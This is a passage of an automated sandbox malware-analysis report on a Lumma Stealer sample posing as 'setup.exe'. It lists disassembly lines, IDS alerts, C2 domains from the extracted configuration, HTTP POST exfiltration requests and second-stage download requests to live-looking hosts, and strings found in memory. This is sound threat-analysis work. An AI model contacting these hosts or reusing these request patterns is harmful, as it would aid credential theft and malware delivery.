          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+589521F5h]0_2_007F203D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 31E2A9F4h0_2_007EB09D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then test eax, eax0_2_007EB09D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 4B1BF3DAh0_2_007EB09D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ebx, bx0_2_007D7111
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h0_2_007C626D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov word ptr [edx], cx0_2_007C626D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ebx, edx0_2_007F123F
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_007E722D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000000A0h]0_2_007D42F6
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], DA026237h0_2_007D42F6
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_007CB2BF
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_007D5352
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_007DF340
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_007B43DD
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edi, esi0_2_007F03B5
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-748B770Eh]0_2_007F245D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp ecx0_2_007F1491
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]0_2_007EA5ED
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D366D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-45h]0_2_007C661D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, ebp0_2_007BA60D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [eax+edx+02h], 0000h0_2_007BC6FB
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, ebx0_2_007C66DF
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edi, byte ptr [edx]0_2_007BC74A
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp eax0_2_007D9714
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then push esi0_2_007D27F0
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov esi, eax0_2_007CA797
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EABBD981h0_2_007BF85D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_007DB83D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]0_2_007EF828
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov word ptr [esi], cx0_2_007CE8CD
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edx, ecx0_2_007C69DD
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp edx0_2_007D49AD
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp edx0_2_007D49A4
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov esi, eax0_2_007CFA6D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04AB0530h]0_2_007CFA6D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx eax, word ptr [ebp+ecx+00h]0_2_007D3A4D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax+38A2D7F7h]0_2_007DAA3E
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edx, ecx0_2_007BDBE1
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp edx0_2_007D4BBD
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_007D4B92
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_007B8C3D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_007B8C3D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+589521F5h]0_2_007F1C2D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04273BF7h]0_2_007BFCC5
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DDCAC
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov edx, ecx0_2_007DDCAC
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp ecx0_2_007D6D21
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov esi, dword ptr [ebp+08h]0_2_007C7D95
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp byte ptr [esi+ebp], 00000000h0_2_007DBE5D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_007D9ED6
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h0_2_007D3F7D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007D3F7D
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp eax0_2_007EAF64
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then jmp ecx0_2_007D6F4F
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007DDF10
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DCE06
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007C7F9F
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DCF93
          Source: C:\Users\user\Desktop\setup.exeCode function: 4x nop then mov ecx, eax0_2_007DCF89

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.32.1:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: prisonyfork.buzz
          Source: Malware configuration extractorURLs: screwamusresz.buzz
          Source: Malware configuration extractorURLs: scentniej.buzz
          Source: Malware configuration extractorURLs: inherineau.buzz
          Source: Malware configuration extractorURLs: learningypr.click
          Source: Malware configuration extractorURLs: appliacnesot.buzz
          Source: Malware configuration extractorURLs: cashfuzysao.buzz
          Source: Malware configuration extractorURLs: rebuildeso.buzz
          Source: Malware configuration extractorURLs: hummskitnj.buzz
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.208.58:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49746
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RVM1PD4RW0Q7YUQJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18150Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KKG02N6EUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8729Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=POEN4VU2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20376Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z88PPM2LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7069Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HXTEUTBDR7M2M2TJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1243Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7DH7ZQOL75A5IGHY65User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585356Host: learningypr.click
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: learningypr.click
          Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
          Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
          Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
          Source: global trafficDNS traffic detected: DNS query: learningypr.click
          Source: global trafficDNS traffic detected: DNS query: cegu.shop
          Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
          Source: global trafficDNS traffic detected: DNS query: dfgh.online
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: learningypr.click
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro4f
          Source: powershell.exe, 00000004.00000002.2028338121.0000000008C42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
          Source: powershell.exe, 00000004.00000002.2014602281.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: BrightLib.exe, 00000025.00000002.2608076575.0000000001A97000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608879083.0000000006344000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000000.2570130644.0000000000AEE000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000002.2608169380.0000000003270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/
          Source: BrightLib.exe, 00000025.00000002.2608169380.0000000003270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/4
          Source: setup.exe, 00000000.00000003.1828202359.000000000094A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1885564075.0000000000957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
          Source: powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://ocsp.securetrust.com/0?
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://ocsp.trustwave.com/06
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://ocsp.vikingcloud.com/0:
          Source: setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://ocsp.vikingcloud.com/0A
          Source: powershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://subca.ocsp-certum.com01
          Source: powershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: BrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drString found in binary or memory: http://www.autohotkey.com
          Source: BrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drString found in binary or memory: http://www.autohotkey.comCould
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drString found in binary or memory: http://www.certum.pl/CPS0
          Source: BrightLib.exe, 00000025.00000002.2630344211.000000003A04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
          Source: setup.exeString found in binary or memory: http://www.toolwiz.com
